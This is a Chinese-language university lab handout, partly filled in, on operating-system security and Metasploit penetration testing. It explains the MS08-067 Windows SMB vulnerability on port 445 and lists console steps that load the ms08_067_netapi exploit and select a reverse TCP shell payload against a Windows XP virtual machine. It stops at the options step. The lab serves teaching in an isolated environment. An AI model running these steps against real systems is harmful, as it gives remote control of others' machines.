计算机系统安全 实验二: 操作系统安全与metasploit渗透测试
实验目的:
实验原理:
Windows 操作系统安全结构 网络渗透原理 实验环境:
软件: vmware 环境下,
虚拟机, vm-WinXP镜像
虚拟机,backtrack 4及backtrack 5 虚拟机镜像 等。 学习计算机操作系统安全相关内容。 学习操作系统渗透相关内容 学习metasploit渗透工具使用。
实验拓扑:
被渗透机: 使用虚拟机XP,建议使用未安装更新的英文XP操作系统,, 设置其IP地址为,自动获得,虚拟机网络连接方式 NAT方式。实验室计算机network系统下中network_vm 目录中有metasploitable_XP,可使用之。
渗透测试机: 使用Bt4或5作为操作系统,
准备工作:
启动两台虚拟机,按上图方式设置,请先记录下两台虚拟机的IP:
被渗透机:
操作系统:____windows xp with sp1_________ IP地址:
渗透测试机:
操作系统:___________bt5_______ IP地址:注意,若网络连接未启用,请先启用之,linux 下可使用ifup eth0)
实验内容:
第一部分:针对操作系统内部服务端口进行渗透
了解ms08-067漏洞详情: (请课后上网查询相关内容) 漏洞描述:
曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。 漏洞对象:
受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有Windows XP /2000/Vista/2003等。除Windows Server 2008 Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows 2000、Windows XP和Windows Server 2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。
漏洞端口:
_______445_________________________________________________
步骤一:
启动metasploit 控制台msfconsole
记录其
步骤二:
搜索模块 ms08-067号模块
search ms08-067
找到模块,记录其名称,级别,描述 步骤三:
使用这个模块
use windows/smb/ms08_067_netapi
步骤四:
查找有用的payloads show payloads
步骤五:
使用其中最常用的一个payload set payload windows/shell/reverse_tcp
步骤六:
查看当前的这个payload 以及攻击所需要的参数选项 show options